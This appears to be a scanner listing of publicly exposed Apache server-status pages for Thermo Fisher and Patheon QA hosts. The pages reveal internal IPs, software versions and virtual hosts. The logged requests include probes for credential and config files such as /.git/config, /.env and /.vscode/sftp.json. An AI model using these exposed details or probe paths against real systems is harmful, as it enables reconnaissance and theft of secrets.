10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 27-078792/41/41K 0.085402696020.74.114.11 10.253.106.180http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 28-078800/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 29-085201/1/2K 0.0155113122262418.40.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions.html HTTP/1.1 30-085211/1/2K 0.00624323864688.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 31-085222/2/3K 0.01511272548421.20.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 32-085232/2/3K 0.0142294370738.90.040.04 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /content/dam/LifeTech/global/promotions/meganav/2017/01-Jan 33-078900/0/0R 0.00532000.00.000.00 10.253.106.199http/1.1 34-078993/3/3K 0.006813559.40.010.01 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /akamai/sureroute-test-object.html HTTP/1.1 35-079033/27/27K 0.09501935919105.72.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /kr/en/home.html HTTP/1.1 36-079041/4/4K 0.0067021.30.000.00 10.253.106.180http/1.1www-qa.patheon.cn:80GET / HTTP/1.1 37-079052/29/29K 0.0343174264864.42.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /search/chat-launcher/chat-launcher.js HTTP/1.1 38-079060/19/19R 0.04318013780.01.641.64 10.253.106.199http/1.1 39-079070/0/0R 0.00439000.00.000.00 10.253.106.180http/1.1 40-079080/0/0R 0.00360000.00.000.00 10.253.106.199http/1.1 41-082230/0/1R 0.00506000.00.000.00 10.253.106.199http/1.1 42-082240/0/1R 0.00505000.00.000.00 10.253.106.199http/1.1 43-082250/0/1R 0.00505000.00.000.00 10.253.106.199http/1.1 44-082264/4/5K 0.0167128463.30.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 45-082277/7/8K 0.016341739838.10.040.04 10.253.106.180http/1.1qa1.unitylabservices.com:80GET /home/default.aspx HTTP/1.1 46-082280/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 47-082290/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 48-084057/7/8K 0.00462075241667159.50.160.16 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/en/index/about.html HTTP/1.1 49-079173/3/3K 0.0048203759662.00.060.06 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 50-084062/2/3K 0.016064741298018.50.020.02 10.253.106.180http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 51-079191/1/1K 0.0046208254165064.90.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/SJTest/corporate-social-responsibili 52-079201/11/11K 0.015882711660615.23.993.99 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/events.html HTTP/1.1 53-0840717/17/18K 0.060549567371.60.360.36 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 54-084573/3/4K 0.004923380560.80.060.06 10.253.106.199http/1.1qa1.unitylabservices.com:80GET /en/home.html HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cdec5b3d9
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 28-Jun-2023 15:14:49 EDT Restart Time: Wednesday, 28-Jun-2023 15:00:05 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 minutes 43 seconds Server load: 0.25 0.07 0.03 Total accesses: 1018 - Total Traffic: 23.0 MB - Total Duration: 1539102 CPU Usage: u1.2 s.62 cu.09 cs.08 - .225% CPU load 1.15 requests/sec - 26.7 kB/second - 23.2 kB/request - 1511.89 ms/request 163 requests currently being processed, 41 idle workers KKKKKKKKKKK_____RK_RRRKRRKKKRKKKKRKKKKRRRRRRKKRRKKKKKKK_KKKKKKKK KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KRKKKKKKKKKKKKKKKKK_KKKKKKKKKKKKKKRK.KKR............K....___KWC_ _____________________________................................... ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0785289/89/89K 0.040051132.50.130.13 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 1-0785389/89/89K 0.043055132.10.130.13 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-078549/70/70K 0.126157591639937.40.240.24 10.253.106.180http/1.1www-qa.patheon.cn:80GET /global-network HTTP/1.1 3-0785554/220/220K 0.250655621181.50.480.48 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /login.action HTTP/1.1 4-078561/2/2K 0.005880311606816.30.330.33 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 5-078574/4/4K 0.0030428524.10.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/font-a 6-078581/1/1K 0.0155116822336416.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 7-078594/4/4K 0.0144037350653.30.640.64 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /etc.clientlibs/tfsite/clientlibs/clientlib-site.min.css HT 8-078601/1/1K 0.00633367673489.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/newsroom/thermo-fisher-scientific-opens-viral-vector 9-078613/3/3K 0.0151502927222.90.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 10-078621/1/1K 0.01304112221.90.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 16-078680/0/0R 0.00537000.00.000.00 10.253.106.180http/1.1 17-078694/4/4K 0.00259088447.20.050.05 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 18-078700/2/2_ 0.00016580.00.000.00 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 19-078710/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 20-078720/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 21-078730/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 22-078744/4/4K 0.002291311617.00.020.02 10.253.106.180http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 23-078750/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 24-078760/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 25-085191/1/2K 0.01624387877514.60.010.01 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/home.html HTTP/1.1 26-078782/2/2K 0.016066381330515.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 27-078792/41/41K 0.085402696020.74.114.11 10.253.106.180http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 28-078800/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 29-085201/1/2K 0.0155113122262418.40.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions.html HTTP/1.1 30-085211/1/2K 0.00624323864688.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 31-085222/2/3K 0.01511272548421.20.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 32-085232/2/3K 0.0142294370738.90.040.04 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /content/dam/LifeTech/global/promotions/meganav/2017/01-Jan 33-078900/0/0R 0.00532000.00.000.00 10.253.106.199http/1.1 34-078993/3/3K 0.006813559.40.010.01 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /akamai/sureroute-test-object.html HTTP/1.1 35-079033/27/27K 0.09501935919105.72.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /kr/en/home.html HTTP/1.1 36-079041/4/4K 0.0067021.30.000.00 10.253.106.180http/1.1www-qa.patheon.cn:80GET / HTTP/1.1 37-079052/29/29K 0.0343174264864.42.412.41 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /search/chat-launcher/chat-launcher.js HTTP/1.1 38-079060/19/19R 0.04318013780.01.641.64 10.253.106.199http/1.1 39-079070/0/0R 0.00439000.00.000.00 10.253.106.180http/1.1 40-079080/0/0R 0.00360000.00.000.00 10.253.106.199http/1.1 41-082230/0/1R 0.00505000.00.000.00 10.253.106.199http/1.1 42-082240/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 43-082250/0/1R 0.00504000.00.000.00 10.253.106.199http/1.1 44-082264/4/5K 0.0167128463.30.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 45-082277/7/8K 0.016341739838.10.040.04 10.253.106.180http/1.1qa1.unitylabservices.com:80GET /home/default.aspx HTTP/1.1 46-082280/0/1R 0.00503000.00.000.00 10.253.106.199http/1.1 47-082290/0/1R 0.00503000.00.000.00 10.253.106.199http/1.1 48-084057/7/8K 0.00462075241667159.50.160.16 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/en/index/about.html HTTP/1.1 49-079173/3/3K 0.0048203759662.00.060.06 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 50-084062/2/3K 0.016064741298018.50.020.02 10.253.106.180http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 51-079191/1/1K 0.0046208254165064.90.060.06 10.253.106.199http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/SJTest/corporate-social-responsibili 52-079201/11/11K 0.015882711660615.23.993.99 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/events.html HTTP/1.1 53-0840717/17/18K 0.060549567371.60.360.36 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 54-084573/3/4K 0.004923380560.80.060.06 10.253.106.199http/1.1qa1.unitylabservices.com:80GET /en/home.html HTTP/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c30243f21
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.56 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Mar 15 2023 20:56:52 Current Time: Thursday, 11-May-2023 06:45:04 EDT Restart Time: Tuesday, 09-May-2023 17:47:59 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 12 hours 57 minutes 4 seconds Server load: 0.08 0.02 0.01 Total accesses: 40100 - Total Traffic: 406.8 MB - Total Duration: 1972264 CPU Usage: u11 s16.03 cu37.13 cs10.32 - .056% CPU load .301 requests/sec - 3206 B/second - 10.4 kB/request - 49.1836 ms/request 41 requests currently being processed, 10 idle workers KKKK__KKR_K_R__W__._..R.R...RRRR..R..R..RR_.R.K..KR........RK.RR R.RRR.RR.RK..RRR...................................RR........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-03154614/18/230K 0.010122214818.40.026.79 10.253.106.133http/1.1www-qa.patheon.kr:80GET /config.json HTTP/1.1 1-041448/8/170K 0.00022336412.70.011.25 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /telescope/requests HTTP/1.1 2-0293913303/13303/13303K 7.8820789820127.919.6619.66 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0294013303/13303/13303K 7.2020740520127.919.6619.66 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 4-041450/0/160_ 0.0010310690.00.003.14 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 5-016750/14/186_ 0.0103196680.00.021.38 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 6-03155011/13/232K 0.01031603620.00.022.76 10.253.106.167http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 7-0246324/10/178K 0.010531099.10.035.60 10.253.106.167http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 8-016810/0/210R 0.006680153590.00.004.49 10.253.106.133http/1.1 9-041460/0/224_ 0.0010208960.00.004.14 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 10-0180456/32/223K 0.2606228558.40.892.03 10.253.106.167http/1.1www-qa.patheon.kr:80GET /login.action HTTP/1.1 11-041470/0/190_ 0.0000287780.00.002.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 12-0315560/16/184R 0.006680219860.00.044.66 10.253.106.167http/1.1 13-041480/0/262_ 0.0000438960.00.002.32 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 14-041490/0/199_ 0.0000495370.00.001.73 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 15-03275715/19/231W 0.0400970519.00.119.02 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 16-017760/16/245_ 0.0111198100.00.023.41 10.253.106.133http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 17-041500/0/143_ 0.0000291970.00.002.13 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 18-0-0/0/187. 0.007130254780.00.006.38 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 19-0327590/4/136_ 0.002022630.00.001.26 10.253.106.167http/1.1www-qa.patheon.cn:80GET /.git/config HTTP/1.1 20-0-0/0/160. 0.0012290270590.00.003.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 21-0-0/0/170. 0.00662030850.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 22-017890/0/163R 0.00668041670.00.002.26 10.253.106.133http/1.1 23-0-0/0/176. 0.009720153860.00.005.56 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 24-0283220/9/224R 0.026991797100.00.182.70 10.253.106.167http/1.1 25-0-0/0/175. 0.0012350326180.00.002.05 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 26-0-0/0/170. 0.0012160339800.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-0-0/0/272. 0.0012240360040.00.0016.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-023220/2/139R 0.0012323889728360.00.151.94 10.253.106.167http/1.1 29-0296010/22/222R 0.029730144790.01.223.39 10.253.106.167http/1.1 30-0327600/0/247R 0.00668083480.00.0010.55 10.253.106.133http/1.1 31-0288110/2/205R 0.006994146860.00.004.57 10.253.106.167http/1.1 32-0-0/0/218. 0.006650267330.00.0022.42 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-0-0/0/247. 0.006960245750.00.003.49 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 34-0320970/1/221R 0.00715067230.00.009.95 10.253.106.133http/1.1 35-0-0/0/163. 0.0012340313290.00.004.76 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 36-0-0/0/200. 0.00664042240.00.002.58 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 37-0288260/24/232R 0.049688802580630.00.12102.29 10.253.106.133http/1.1 38-0-0/0/146. 0.00666087990.00.001.62 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 39-0-0/0/173. 0.0012320297760.00.001.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 40-04860/8/193R 0.006680164090.00.013.48 10.253.106.133http/1.1 41-023230/5/153R 0.0497310197100.00.131.58 10.253.106.167http/1.1 42-023240/36/151_ 0.0305192190.00.060.81 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 43-0-0/0/156. 0.001018089950.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 44-023250/1/158R 0.0010306715342510.00.021.73 10.253.106.133http/1.1 45-0-0/0/170. 0.0012330446410.00.002.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 46-0232614/18/235K 0.010102796216.40.231.48 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 47-0-0/0/139. 0.0012250446900.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-0-0/0/105. 0.0012380216720.00.000.91 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 49-0200771/12/200K 0.0230191460.90.443.84 10.253.106.167http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 50-0321120/0/184R 0.00715058470.00.002.23 10.253.106.167http/1.1 51-0-0/0/194. 0.0012270421000.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 52-0-0/0/156. 0.0012170364000.00.001.57
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c404a4c40
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.56 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Mar 15 2023 20:56:52 Current Time: Thursday, 11-May-2023 06:45:04 EDT Restart Time: Tuesday, 09-May-2023 17:47:59 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 12 hours 57 minutes 4 seconds Server load: 0.00 0.00 0.00 Total accesses: 40079 - Total Traffic: 406.7 MB - Total Duration: 1971728 CPU Usage: u10.99 s16.02 cu37.13 cs10.32 - .056% CPU load .301 requests/sec - 3206 B/second - 10.4 kB/request - 49.196 ms/request 41 requests currently being processed, 10 idle workers KWKK__KKR_K_R__W__._..R.R...RRRR..R..R..RR_.R.K..KR........RK.RR R.RRR.RR.RK..RRR...................................RR........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-03154614/18/230K 0.010122214818.40.026.79 10.253.106.133http/1.1www-qa.patheon.kr:80GET /config.json HTTP/1.1 1-041440/0/162W 0.000031430.00.001.23 10.253.106.133http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 2-0293913303/13303/13303K 7.8820789820127.919.6619.66 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0294013303/13303/13303K 7.2020740520127.919.6619.66 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 4-041450/0/160_ 0.0010310690.00.003.14 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 5-016750/14/186_ 0.0103196680.00.021.38 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 6-03155011/13/232K 0.01031603620.00.022.76 10.253.106.167http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 7-0246322/8/176K 0.010330976.50.035.60 10.253.106.167http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 8-016810/0/210R 0.006680153590.00.004.49 10.253.106.133http/1.1 9-041460/0/224_ 0.0010208960.00.004.14 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 10-0180456/32/223K 0.2606228558.40.892.03 10.253.106.167http/1.1www-qa.patheon.kr:80GET /login.action HTTP/1.1 11-041470/0/190_ 0.0000287780.00.002.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 12-0315560/16/184R 0.006680219860.00.044.66 10.253.106.167http/1.1 13-041480/0/262_ 0.0000438960.00.002.32 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 14-041490/0/199_ 0.0000495370.00.001.73 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 15-0327576/10/222W 0.020094248.00.109.01 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /v2/_catalog HTTP/1.1 16-017760/16/245_ 0.0101198100.00.023.41 10.253.106.133http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 17-041500/0/143_ 0.0000291970.00.002.13 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 18-0-0/0/187. 0.007130254780.00.006.38 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 19-0327590/4/136_ 0.001022630.00.001.26 10.253.106.167http/1.1www-qa.patheon.cn:80GET /.git/config HTTP/1.1 20-0-0/0/160. 0.0012280270590.00.003.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 21-0-0/0/170. 0.00662030850.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 22-017890/0/163R 0.00668041670.00.002.26 10.253.106.133http/1.1 23-0-0/0/176. 0.009720153860.00.005.56 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 24-0283220/9/224R 0.026991797100.00.182.70 10.253.106.167http/1.1 25-0-0/0/175. 0.0012340326180.00.002.05 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 26-0-0/0/170. 0.0012150339800.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-0-0/0/272. 0.0012230360040.00.0016.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-023220/2/139R 0.0012323889728360.00.151.94 10.253.106.167http/1.1 29-0296010/22/222R 0.029730144790.01.223.39 10.253.106.167http/1.1 30-0327600/0/247R 0.00668083480.00.0010.55 10.253.106.133http/1.1 31-0288110/2/205R 0.006994146860.00.004.57 10.253.106.167http/1.1 32-0-0/0/218. 0.006650267330.00.0022.42 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-0-0/0/247. 0.006960245750.00.003.49 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 34-0320970/1/221R 0.00715067230.00.009.95 10.253.106.133http/1.1 35-0-0/0/163. 0.0012330313290.00.004.76 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 36-0-0/0/200. 0.00664042240.00.002.58 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 37-0288260/24/232R 0.049688802580630.00.12102.29 10.253.106.133http/1.1 38-0-0/0/146. 0.00666087990.00.001.62 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 39-0-0/0/173. 0.0012310297760.00.001.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 40-04860/8/193R 0.006680164090.00.013.48 10.253.106.133http/1.1 41-023230/5/153R 0.0497310197100.00.131.58 10.253.106.167http/1.1 42-023240/36/151_ 0.0305192190.00.060.81 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 43-0-0/0/156. 0.001018089950.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 44-023250/1/158R 0.0010306715342510.00.021.73 10.253.106.133http/1.1 45-0-0/0/170. 0.0012320446410.00.002.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 46-0232612/16/233K 0.01062794013.10.231.48 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /.env HTTP/1.1 47-0-0/0/139. 0.0012240446900.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-0-0/0/105. 0.0012370216720.00.000.91 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 49-0200771/12/200K 0.0220191460.90.443.84 10.253.106.167http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 50-0321120/0/184R 0.00715058470.00.002.23 10.253.106.167http/1.1 51-0-0/0/194. 0.0012260421000.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 52-0-0/0/156. 0.0012160364000.00.001.57 127.0.0.1http/1.1qa1-chemicals.t
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c37cc362c
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 14-Apr-2023 16:46:48 EDT Restart Time: Thursday, 13-Apr-2023 11:25:25 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 5 hours 21 minutes 22 seconds Server load: 0.06 0.02 0.00 Total accesses: 31592 - Total Traffic: 623.4 MB - Total Duration: 575274 CPU Usage: u7.19 s13.15 cu34.85 cs7.75 - .0596% CPU load .299 requests/sec - 6.0 kB/second - 20.2 kB/request - 18.2095 ms/request 76 requests currently being processed, 20 idle workers KKKRRKKRRRKRRRKKRKRRKKKRRRKKKKKRKKRRRKKRKK_KKKKKKK_RRRKRRRKRRKKW KWRRRWKWK_RR_RKR________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0103081/33/165K 0.0544037990.80.200.87 10.253.106.215http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 1-0383810568/10568/10568K 4.9890496815966.415.5915.59 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-0383910568/10568/10568K 6.1990611015966.315.5915.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0134500/0/196R 0.00534082210.00.002.48 10.253.106.141http/1.1 4-0136360/1/169R 0.00839057860.00.001.95 10.253.106.215http/1.1 5-0134513/13/328K 0.00310112453.90.430.92 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /v2/_catalog HTTP/1.1 6-0130771/14/140K 0.014624810.70.052.13 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 7-0128580/6/134R 0.00575023960.00.011.33 10.253.106.215http/1.1 8-0140220/0/129R 0.00819041440.00.002.57 10.253.106.215http/1.1 9-0132680/1/199R 0.00257141124480.00.013.42 10.253.106.141http/1.1 10-0145381/1/145K 0.004349484.50.001.15 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 11-0134520/6/129R 0.00514040440.01.292.74 10.253.106.141http/1.1 12-0140230/0/120R 0.00798033270.00.001.09 10.253.106.141http/1.1 13-0135070/0/149R 0.00575085980.00.001.24 10.253.106.141http/1.1 14-01363717/17/166K 0.0235357855.10.051.09 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /login.action HTTP/1.1 15-0145406/6/151K 0.00011573410.00.014.18 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /v2/_catalog 